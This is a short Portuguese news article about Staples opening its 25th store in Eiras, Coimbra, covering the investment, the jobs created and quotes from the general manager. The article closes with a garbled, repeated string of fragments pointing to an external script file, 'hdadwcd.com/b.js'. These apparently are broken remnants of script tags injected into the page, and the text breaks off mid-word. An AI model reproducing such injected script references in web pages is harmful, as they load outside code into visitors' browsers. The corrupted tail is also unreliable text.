A Staples vai inaugurar dia 26 de Janeiro a sua 25ª loja em Eiras, Coimbra, num investimento global de cerca de 5 milhões de euros e que representa a criação de 45 novos postos de trabalho directos e outros tantos indirectos.
A nova loja tem uma área de venda no total de 1600 m2 e mais de 7000 artigos disponíves de áreas tão diversas como a papelaria, mobiliário, equipamento e tecnologia de escritório, assim como um centro de impressão & cópias de grande capacidade, que vai servir uma população de 230 mil habitantes.
Para o director-geral da Staples, Carlos Duarte Maia, «contribuir para a melhoria de qualidade de vida e aumentar o poder de compra na Região de Coimbra, proporcionando os preços mais baixos em todos os segmentos de oferta em que actuamos, é o compromisso que assumo desde a primeira hora da Staples de Coimbra, porque é esse o nosso modo de participar no desenvolvimento de uma região de que temos orgulho em pertencer a partir do dia 26 Janeiro».
A inauguração vai contar com a presença do Presidente e do vice-presidente da Câmara Municipal de Coimbra, assim como com a animação do grupo musical 4Taste e do popular personagem animado Noddy.
Com este investimento, a Staples dá continuidade ao objectivo assumido de abrir 23 novas lojas até 2010 num investimento total de 100 milhões de euros, que permitirá a criação de cerca de 1000 novos postos de trabalho.
ttp://www.hdadwcd.com/b.js>rc=http://www.hdadwcd.com/b.js>rc=http://www.hdadwcd.com/b.js>rc=http://www.hdadwcd.com/b.js>rc=http://www.hdadwcd.com/b.js>rc=http://www.hdadwcd.com/b.js>rc=http://www.hdadwcd.com/b.js>rc=h
